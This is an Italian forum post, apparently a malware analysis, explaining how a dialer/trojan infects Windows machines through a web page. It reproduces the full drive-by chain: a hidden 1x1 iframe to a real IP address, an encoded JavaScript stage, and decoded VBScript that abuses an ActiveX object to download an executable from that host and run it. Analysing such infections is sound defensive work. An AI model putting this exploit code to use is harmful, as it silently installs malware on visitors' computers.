Dovrebbero esserci 2 files in C:\temp: IT_0118.exe e winsyst32.exe; sono generati dal file service32.exe che giunge normalmente da una pagina via VBScript...
...si tratta di un Dialer + Trojan Horse virus, proveniente dall'Ucraina (RU).
Per conoscenza:
il virus si prende aprendo una pagina che include un iframe che linka a un JavaScript document.write che costruisce un VBscript.
Pagina con l'iframe:
codice:
<html>
<title>under construction</title>
<body>
<iframe src="http://195.225.176.34/user2/bond0167/index.php" width=1 height=1></iframe>
<center><font size=12>under construction </font></center>
<table height=100%>
<tr height=100% valign=bottom>
<td>
<script type="text/javascript">
<!--
document.write('<a href="http://www.liveinternet.ru/click" ' +
'target=_blank><img src="http://counter.yadro.ru/hit?t44.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';'+Math.random()+
'" alt="" title="LiveInternet" '+
'border=0 width=31 height=31><\/a>')
//-->
</script>
</td>
</tr>
</table>
</body>
</html>
il file PHP nell'iframe:
codice:
<script type="text/javascript">
<!-- var var33122251183=(
'%3C%53%43%52%49%50%54%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63'+
'%72%69%70%74%22%3E%0D%0A%20%20%20%20%49%66%20%6E%61%76%69%67%61%74'+
'%6F%72%2E%61%70%70%4E%61%6D%65%3D%22%4D%69%63%72%6F%73%6F%66%74%20'+
... altre 100 righe
'%20%45%6E%64%20%49%66%0D%0A%20%20%20%0D%0A%20%20%20%20%45%6E%64%20'+
'%49%66%0D%0A%20%20%20%20%45%6E%64%20%49%66%0D%0A%20%20%20%0D%0A%3C'+
'%2F%53%43%52%49%50%54%3E%0D%0A%0D%0A');
document.write(var33122251183);
</Script>
VBScript costruito dal document.write:
codice:
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
Dim Obj_Name
Dim Obj_Prog
set obj_RDS = document.createElement("object")
obj_RDS.setAttribute "id", "obj_RDS"
obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
fn = "226184122185.exe"
Obj_Name = "Shell"
Obj_Prog = "Application"
set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set oFolder = obj_ShellApp.NameSpace(20)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
fn=WinDir & fn
Obj_Name = "Microsoft"
Obj_Prog = "XMLHTTP"
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "GET","http://195.225.176.34/user2/bond0167/service32.exe",False
obj_msxml2.send
On Error Resume Next
Obj_Name = "ADODB"
Obj_Prog = "Stream"
set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
If Err.Number Then
Obj_Name = "Scripting"
Obj_Prog = "FileSystemObject"
Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set download_file=obj_FileSys.CreateTextFile(fn, TRUE)
download_file_size=LenB(XMLBody)
For i=1 To download_file_size
cByte=MidB(XMLBody,i,1)
ByteCode=AscB(cByte)
download_file.Write(Chr(ByteCode))
Next
download_file.Close
Obj_Name = "WScript"
Obj_Prog = "Shell"
Set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
On Error Resume Next
obj_WShell.Run fn,1,FALSE
Else
obj_adodb.Type=1
obj_adodb.Open
obj_adodb.Write(obj_msxml2.responseBody)
obj_adodb.SaveToFile fn,2
obj_ShellApp.ShellExecute fn
End If
End If
End If
</SCRIPT>
Ciao
FSL
Permessi di invio
Rispondi quotando